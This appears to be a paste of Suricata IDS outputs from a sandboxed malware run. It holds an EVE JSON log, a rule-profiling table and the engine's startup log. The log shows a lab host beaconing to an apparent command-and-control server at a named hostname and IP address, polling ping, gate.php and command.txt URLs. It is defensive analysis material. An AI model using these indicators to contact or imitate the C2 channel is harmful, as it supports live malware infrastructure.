{"timestamp":"2019-09-11T14:44:30.108751+0000","flow_id":2154753018919982,"pcap_cnt":161,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/ping.txt?rnd=652970073.99542","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":17},"app_proto":"http","fileinfo":{"filename":"\/ping.txt","gaps":false,"state":"CLOSED","stored":false,"size":17,"tx_id":11}}
{"timestamp":"2019-09-11T14:44:30.314775+0000","flow_id":2154753018919982,"pcap_cnt":162,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/gate.php?status=Free&rnd=971429763.310168","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/html"}}
{"timestamp":"2019-09-11T14:44:30.658788+0000","flow_id":2154753018919982,"pcap_cnt":165,"event_type":"http","src_ip":"192.168.56.101","src_port":49173,"dest_ip":"77.222.62.31","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=119383216.665469","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain"}}
{"timestamp":"2019-09-11T14:44:30.748850+0000","flow_id":2154753018919982,"pcap_cnt":167,"event_type":"fileinfo","src_ip":"77.222.62.31","src_port":80,"dest_ip":"192.168.56.101","dest_port":49173,"proto":"TCP","http":{"hostname":"x0x22a3720.temp.swtest.ru","url":"\/command.txt?rnd=119383216.665469","http_user_agent":"Mozilla\/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident\/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)","http_content_type":"text\/plain","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":4},"app_proto":"http","fileinfo":{"filename":"\/c

This file has been truncated. Go here to download in full.


suricata-4.0.0-etpro-all-perf.txt-2019-09-16-T-10-50-40-09162019.1050-pcap_4.pcap.txt - (58710 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
  --------------------------------------------------------------------------
  Date: 9/16/2019 -- 10:50:40. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2816922      1        5        16223556     2.95   79       0        11626210    205361.47   0.00        205361.47  
  2        2023623      1        3        10903404     1.98   93       0        10474946    117240.90   0.00        117240.90  
  3        2805348      1        4        3090036      0.56   32       0        529408      96563.62    0.00        96563.62   
  4        2023624      1        3        1096846      0.20   126      0        438998      8705.13     0.00        8705.13    
  5        2008120      1        4        1237960      0.22   162      0        418238      7641.73     0.00        7641.73    
  6        2016855      1        2        481518       0.09   2        0        249358      240759.00   0.00        240759.00  
  7        2803027      1        6        527942       0.10   4        0        220806      131985.50   0.00        131985.50  
  8        2016854      1        3        410992       0.07   2        0        217536      205496.00   0.00        205496.00  
  9        2024135      1        2        1692232      0.31   27       0        197470      62675.26    0.00        62675.26   
  10       2802987      1        5        568830       0.10   8        0        184376      71103.75    0.00        71103.75   
  11       2813059      1        4        1119250      0.20   9        0        151164      124361.11   0.00        124361.11  
  12       2816909      1        2        7398520      1.34   79       0        151158      93652.15    0.00        93652.15   
  13       2022339      1        2        4739272      0.86   79       0        150470      59990.78    0.00        59990.78   
  14       2023316      1        2        987896       0.18   25       0        150282      39515.84    0.00        39515.84   
  15       2025064      1        5        4598404      0.84   79       0        147018      58207.65    0.00        58207.65   
  16       2022830      1        2        196688       0.04   2        0        146382      98344.00    0.00        98344.00   
  17       2022566      1        5        202700       0.04   2        0        146092      101350.00   0.00        101350.00  
  18       2816910      1        2        7334592      1.33   79       0        143310      92842.94    0.00        92842.94   
  19       2022658      1        4        202770       0.04   2        0        134732      101385.00   0.00        101385.00  
  20       2816940      1        2        7150580      1.30   79       0        131550      90513.67    0.00        90513.67   
  21       2816895      1        2        4786216      0.87   79       0        129662      60585.01    0.00        60585.01   
  22       2018241      1        2        219038       0.04   2        0        125096      109519.00   0.00        109519.00  
  23       2018959      1        3        211134       0.04   2        2        123342      105567.00   105567.00   0.00       
  24       2824591      1        2        1916596      0.35   27       0        118950      70985.04    0.00        70985.04   
  25       2830124      1        1        4670162      0.85   79       0        118816      59115.97    0.00        59115.97   
  26       2828008      1        2        2814194      0.51   79       0        118094      35622.71    0.00        35622.71   
  27       2018242      1        5        3687990      0.67   79       0        117212      46683.42    0.00        46683.42   
  28       2018958      1        18       6250328      1.14   79       0        116704      79118.08    0.00        79118.08   
  29       2023315      1        2        6097636      1.11   79       0        114334      77185.27    0.00        77185.27   
  30       2808793      1        3        3071424      0.56   50       0        114270      61428.48    0.00        61428.48   
  31       2018666      1        4        223216       0.04   3        0        112858      74405.33    0.00        74405.33   
  32       2022503      1        2        5418180      0.98   79       0        112814      68584.56    0.00        68584.56   
  33       2828986      1        2        1476796      0.27   27       0        111406      54696.15    0.00        54696.15   
  34       2023875      1        2        4909748      0.89   79       0        111268      62148.71    0.00        62148.71   
  35       2003657      1        18       3085938      0.56   79       0        110834      39062.51    0.00        39062.51   
  36       2022502      1        4        5405686      0.98   79       0        110748      68426.41    0.00        68426.41   
  37       2816930      1        4        5205792      0.95   79       0        109882      65896.10    0.00        65896.10   
  38       2014442      1        6        1872302      0.34   27       0        108432      69344.52    0.00        69344.52   
  39       2023679      1        3        185230       0.03   2        0        107230      92615.00    0.00        92615.00   
  40       2022609      1        2        4335728      0.79   79       0        106364      54882.63    0.00        54882.63   
  41       2829607      1        1        3014956      0.55   79       0        105054      38164.00    0.00        38164.00   
  42       2022818      1        3        1905624      0.35   27       0        104600      70578.67    0.00        70578.67   
  43       2016706      1        20       1747756      0.32   27       0        103198      64731.70    0.00        64731.70   
  44       2024141      1        2        1658522      0.30   27       0        102514      61426.74    0.00        61426.74   
  45       2815180      1        3        1757696      0.32   27       0        102200      65099.85    0.00        65099.85   
  46       2018581      1        3        147730       0.03   2        0        102024      73865.00    0.00        73865.00   
  47       2809547      1        5        2967520      0.54   79       0        101968      37563.54    0.00        37563.54   
  48       2820851      1        5        4624620      0.84   79       0        101652      58539.49    0.00        58539.49   
  49       2816928      1        3        5378620      0.98   79       0        101156      68083.80    0.00        68083.80   
  50       2024140      1        2        1654566      0.30   27       0        100824      61280.22    0.00        61280.22   
  51       2816929      1        4        5260518      0.96   79       0        100646      66588.84    0.00        66588.84   
  52       2816927      1        3        5873382      1.07   79       0        100610      74346.61    0.00        74346.61   
  53       2820786      1        2        1332806      0.24   27       0        99452       49363.19    0.00        49363.19   
  54       2020826      1        7        171980       0.03   2        0        98088       85990.00    0.00        85990.00   
  55       2828060      1        4        1529364      0.28   27       0        98004       56643.11    0.00        56643.11   
  56       2801929      1        7        418954       0.08   6        0        97698       69825.67    0.00        69825.67   
  57       2805089      1        6        2408178      0.44   50       0        97062       48163.56    0.00        48163.56   
  58       2023671      1        4        182304       0.03   2        0        96832       91152.00    0.00        91152.00   
  59       2024142      1        2        1632188      0.30   27       0        96788       60451.41    0.00        60451.41   
  60       2024137      1        2        1627738      0.30   27       0        96048       60286.59    0.00        60286.59   
  61       2828122      1        2        4590126      0.83   79       0        95358       58102.86    0.00        58102.86   
  62       2816327      1        4        4655806      0.85   79       0        95166       58934.25    0.00        58934.25   
  63       2819673      1        4        4532048      0.82   79       0        94982       57367.70    0.00        57367.70   
  64       2018452      1        15       4730804      0.86   79       0        94602       59883.59    0.00        59883.59   
  65       2023670      1        3        5322734      0.97   79       79       94494       67376.38    67376.38    0.00       
  66       2811826      1        7        1613196      0.29   27       0        93950       59748.00    0.00        59748.00   
  67       2815181      1        3        1654786      0.30   27       0        93846       61288.37    0.00        61288.37   
  68       2022896      1        5        169894       0.03   2        0        93822       84947.00    0.00        84947.00   
  69       2822801      1        2        1381796      0.25   27       0        93480       51177.63    0.00        51177.63   
  70       2815182      1        3        1614156      0.29   27       0        93444       59783.56    0.00        59783.56   
  71       2022262      1        3        3753684      0.68   79       0        92460       47514.99    0.00        47514.99   
  72       2023672      1        4        168418       0.03   2        0        92376       84209.00    0.00        84209.00   
  73       2008575      1        5        447804       0.08   25       0        92032       17912.16    0.00        17912.16   
  74       2018316      1        4        214620       0.04   3        0        92018       71540.00    0.00        71540.00   
  75       2821615      1        2        3744162      0.68   79       0        91502       47394.46    0.00        47394.46   
  76       2816931      1        3        5212744      0.95   79       0        91178       65984.10    0.00        65984.10   
  77       2013352      1        4        173908       0.03   2        0        91172       86954.00    0.00        86954.00   
  78       2018079      1        2        1344092      0.24   27       0        91028       49781.19    0.00        49781.19   
  79       2805155      1        3        2447096      0.44   50       0        90498       48941.92    0.00        48941.92   
  80       2011894      1        19       4610198      0.84   79       0        90282       58356.94    0.00        58356.94   
  81       2816328      1        5        3815164      0.69   79       0        90180       48293.22    0.00        48293.22   
  82       2809363      1        3        1372420      0.25   27       0        90060       50830.37    0.00        50830.37   
  83       2803187      1        6        1359266      0.25   27       0        90002       50343.19    0.00        50343.19   
  84       2816925      1        3        4705948      0.85   79       0        89512       59568.96    0.00        59568.96   
  85       2020964      1        2        1405762      0.26   27       0        89408       52065.26    0.00        52065.26   
  86       2804626      1        9        2909520      0.53   79       0        89222       36829.37    0.00        36829.37   
  87       2019881      1        3        3667386      0.67   79       0        89114       46422.61    0.00        46422.61   
  88       2816526      1        13       3603254      0.65   79       0        88284       45610.81    0.00        45610.81   
  89       2024771      1        1        4305182      0.78   159      0        88202       27076.62    0.00        27076.62   
  90       2014405      1        10       3953586      0.72   79       0        88094       50045.39    0.00        50045.39   
  91       2811905      1        3        1326678      0.24   27       0        87962       49136.22    0.00        49136.22   
  92       2019344      1        5        4503860      0.82   79       0        87506       57010.89    0.00        57010.89   
  93       2016858      1        10       4010162      0.73   79       0        87340       50761.54    0.00        50761.54   
  94       2827279      1        5        2930256      0.53   79       0        87136       37091.85    0.00        37091.85   
  95       2021418      1        9        1385736      0.25   27       0        87114       51323.56    0.00        51323.56   
  96       2024133      1        2        1620928      0.29   27       0        87094       60034.37    0.00        60034.37   
  97       2018496      1        9        3746472      0.68   79       0        87026       47423.70    0.00        47423.70   
  98       2816525      1        10       4510076      0.82   79       0        86558       57089.57    0.00        57089.57   
  99       2022220      1        2        5249020      0.95   79       0        85984       66443.29    0.00        66443.29   
  100      2003492      1        30       2913086      0.53   79       0        85384       36874.51    0.00        36874.51   
  101      2812916      1        6        3821928      0.69   79       0        85362       48378.84    0.00        48378.84   
  102      2022986      1        3        1379388      0.25   27       0        85306       51088.44    0.00        51088.44   
  103      2820992      1        4        1418906      0.26   27       0        84958       52552.07    0.00        52552.07   
  104      2805985      1        2        147330       0.03   2        0        84896       73665.00    0.00        73665.00   
  105      2821471      1        2        1349214      0.25   27       0        84682       49970.89    0.00        49970.89   
  106      2020963      1        2        1385644      0.25   27       0        84368       51320.15    0.00        51320.15   
  107      2815220      1        2        1614306      0.29   27       0        84300       59789.11    0.00        59789.11   
  108      2017261      1        3        1332492      0.24   27       0        84290       49351.56    0.00        49351.56   
  109      2014353      1        6        159108       0.03   2        0        83604       79554.00    0.00        79554.00   
  110      2815568      1        2        1574258      0.29   27       0        83310       58305.85    0.00        58305.85   
  111      2807069      1        4        1306150      0.24   25       0        83304       52246.00    0.00        52246.00   
  112      2800919      1        5        1290974      0.23   27       0        83236       47813.85    0.00        47813.85   
  113      2019395      1        2        563952       0.10   9        0        82286       62661.33    0.00        62661.33   
  114      2825587      1        2        1343254      0.24   27       0        81786       49750.15    0.00        49750.15   
  115      2025162      1        2        3685504      0.67   79       0        81784       46651.95    0.00        46651.95   
  116      2021139      1        2        1518698      0.28   27       0        81344       56248.07    0.00        56248.07   
  117      2022985      1        4        1331050      0.24   27       0        81334       49298.15    0.00        49298.15   
  118      2018055      1        3        2510742      0.46   50       0        81146       50214.84    0.00        50214.84   
  119      2801930      1        7        408944       0.07   6        0        80350       68157.33    0.00        68157.33   
  120      2812616      1        2        2404906      0.44   50       0        79930       48098.12    0.00        48098.12   
  121      2018358      1        7        4582334      0.83   79       0        79894       58004.23    0.00        58004.23   
  122      2810045      1        4        126762       0.02   2        0        79502       63381.00    0.00        63381.00   
  123      2014471      1        6        141866       0.03   2        0        79162       70933.00    0.00        70933.00   
  124      2815156      1        2        1316682      0.24   27       0        79064       48766.00    0.00        48766.00   
  125      2024134      1        2        1

This file has been truncated. Go here to download in full.


suricata-report-2019-09-16-T-10-50-40-09162019.1050-pcap_4.pcap.txt - (17648 bytes) - download
  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
lastcmd:ulimit -c unlimited; /opt/suricata400/bin/suricata -c /opt/suricata400/etc/etpro/suricata400-etpro-all.yaml -l /var/www/html/4af40c2c9c43f7fcc993afd736c52ccf56b33745cb75ec8c950e11a498e082d2 -r /var/pcap/09162019.1050-pcap_4.pcap -vvv -k none
elapsedtime:25.804839
stderr:
stdout:
16/9/2019 -- 10:50:14 - <Info> - Configuration node 'rule-files' redefined.
16/9/2019 -- 10:50:14 - <Notice> - This is Suricata version 4.0.0 RELEASE
16/9/2019 -- 10:50:14 - <Info> - CPUs/cores online: 1
16/9/2019 -- 10:50:14 - <Config> - 'default' server has 'request-body-minimal-inspect-size' set to 34194 and 'request-body-inspect-window' set to 17177 after randomization.
16/9/2019 -- 10:50:14 - <Config> - 'default' server has 'response-body-minimal-inspect-size' set to 34187 and 'response-body-inspect-window' set to 16092 after randomization.
16/9/2019 -- 10:50:14 - <Config> - DNS request flood protection level: 500
16/9/2019 -- 10:50:14 - <Config> - DNS per flow memcap (state-memcap): 524288
16/9/2019 -- 10:50:14 - <Config> - DNS global memcap: 16777216
16/9/2019 -- 10:50:14 - <Config> - allocated 262144 bytes of memory for the host hash... 4096 buckets of size 64
16/9/2019 -- 10:50:14 - <Config> - preallocated 1000 hosts of size 136
16/9/2019 -- 10:50:14 - <Config> - host memory usage: 398144 bytes, maximum: 16777216
16/9/2019 -- 10:50:14 - <Config> - using magic-file /usr/share/file/magic
16/9/2019 -- 10:50:14 - <Config> - Core dump size is unlimited.
16/9/2019 -- 10:50:14 - <Config> - allocated 3670016 bytes of memory for the defrag hash... 65536 buckets of size 56
16/9/2019 -- 10:50:14 - <Config> - preallocated 1000 defrag trackers of size 168
16/9/2019 -- 10:50:14 - <Config> - defrag memory usage: 3838016 bytes, maximum: 33554432
16/9/2019 -- 10:50:14 - <Config> - stream "prealloc-sessions": 2048 (per thread)
16/9/2019 -- 10:50:14 - <Config> - stream "memcap": 33554432
16/9/2019 -- 10:50:14 - <Config> - stream "midstream" session pickups: disabled
16/9/2019 -- 10:50:14 - <Config> - stream "async-oneside": disabled
16/9/2019 -- 10:50:14 - <Config> - stream "checksum-validation": disabled
16/9/2019 -- 10:50:14 - <Config> - stream."inline": disabled
16/9/2019 -- 10:50:14 - <Config> - stream "bypass": disabled
16/9/2019 -- 10:50:14 - <Config> - stream "max-synack-queued": 5
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "memcap": 134217728
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "depth": 0
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "toserver-chunk-size": 2477
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "toclient-chunk-size": 2652
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly.raw: enabled
16/9/2019 -- 10:50:14 - <Config> - stream.reassembly "segment-prealloc": 2048
16/9/2019 -- 10:50:14 - <Config> - Delayed detect disabled
16/9/2019 -- 10:50:14 - <Config> - pattern matchers: MPM: ac, SPM: bm
16/9/2019 -- 10:50:14 - <Config> - grouping: tcp-whitelist (default) 53, 80, 139, 443, 445, 1433, 3306, 3389, 6666, 6667, 8080
16/9/2019 -- 10:50:14 - <Config> - grouping: udp-whitelist (default) 53, 135, 5060
16/9/2019 -- 10:50:14 - <Config> - prefilter engines: MPM
16/9/2019 -- 10:50:14 - <Config> - IP reputation disabled
16/9/2019 -- 10:50:14 - <Perf> - Registered 148 keyword profiling counters.
16/9/2019 -- 10:50:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ftp.rules
16/9/2019 -- 10:50:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-policy.rules
16/9/2019 -- 10:50:14 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-trojan.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-games.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-pop3.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-user_agents.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-activex.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-rpc.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-attack_response.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp.rules
16/9/2019 -- 10:50:19 - <Config> - No rules loaded from ET-icmp.rules.
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-scan.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-voip.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-chat.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-icmp_info.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-info.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-shellcode.rules
16/9/2019 -- 10:50:19 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_client.rules
16/9/2019 -- 10:50:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-imap.rules
16/9/2019 -- 10:50:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_server.rules
16/9/2019 -- 10:50:20 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-current_events.rules
16/9/2019 -- 10:50:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-inappropriate.rules
16/9/2019 -- 10:50:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-smtp.rules
16/9/2019 -- 10:50:23 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-web_specific_apps.rules
16/9/2019 -- 10:50:24 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-deleted.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-malware.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-snmp.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-worm.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dns.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-misc.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-sql.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dos.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-netbios.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-telnet.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-exploit.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-p2p.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tftp.rules
16/9/2019 -- 10:50:25 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-mobile_malware.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-botcc.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-compromised.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-drop.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-dshield.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-tor.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/ET-ciarmy.rules
16/9/2019 -- 10:50:27 - <Config> - Loading rule file: /opt/suricata400/etc/etpro/local.rules
16/9/2019 -- 10:50:27 - <Config> - No rules loaded from local.rules.
16/9/2019 -- 10:50:27 - <Info> - 44 rule files processed. 39585 rules successfully loaded, 0 rules failed
16/9/2019 -- 10:50:27 - <Info> - Threshold config parsed: 0 rule(s) found
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tcp-packet
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tcp-stream
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for udp-packet
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for other-ip
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_uri
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_request_line
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_client_body
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_response_line
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_header
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_header
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_header_names
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_header_names
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_accept
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_accept_enc
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_accept_lang
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_referer
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_connection
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_content_len
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_content_len
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_content_type
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_content_type
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_protocol
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_protocol
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_start
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_start
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_raw_header
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_raw_header
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_method
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_cookie
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_cookie
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_raw_uri
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_user_agent
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_host
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_raw_host
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_stat_msg
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_stat_code
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for dns_query
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tls_sni
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tls_cert_issuer
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tls_cert_subject
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for tls_cert_serial
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for dce_stub_data
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for dce_stub_data
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for ssh_protocol
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for ssh_protocol
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for ssh_software
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for ssh_software
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for file_data
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for file_data
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_request_line
16/9/2019 -- 10:50:28 - <Perf> - using shared mpm ctx' for http_response_line
16/9/2019 -- 10:50:28 - <Info> - 39590 signatures processed. 1175 are IP-only rules, 15422 are inspecting packet payload, 27448 inspect application layer, 0 are decoder event only
16/9/2019 -- 10:50:28 - <Config> - building signature grouping structure, stage 1: preprocessing rules... complete
16/9/2019 -- 10:50:28 - <Perf> - TCP toserver: 41 port groups, 37 unique SGH's, 4 copies
16/9/2019 -- 10:50:28 - <Perf> - TCP toclient: 21 port groups, 20 unique SGH's, 1 copies
16/9/2019 -- 10:50:28 - <Perf> - UDP toserver: 41 port groups, 27 unique SGH's, 14 copies
16/9/2019 -- 10:50:28 - <Perf> - UDP toclient: 21 port groups, 17 unique SGH's, 4 copies
16/9/2019 -- 10:50:28 - <Perf> - OTHER toserver: 254 proto groups, 3 unique SGH's, 251 copies
16/9/2019 -- 10:50:28 - <Perf> - OTHER toclient: 254 proto groups, 0 unique SGH's, 254 copies
16/9/2019 -- 10:50:35 - <Perf> - Unique rule groups: 104
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toserver TCP packet": 35
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toclient TCP packet": 17
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toserver TCP stream": 33
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toclient TCP stream": 19
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toserver UDP packet": 27
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "toclient UDP packet": 17
16/9/2019 -- 10:50:35 - <Perf> - Builtin MPM "other IP packet": 3
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_uri": 14
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_request_line": 1
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toserver http_client_body": 6
16/9/2019 -- 10:50:35 - <Perf> - AppLayer MPM "toclient http_response_line": 1
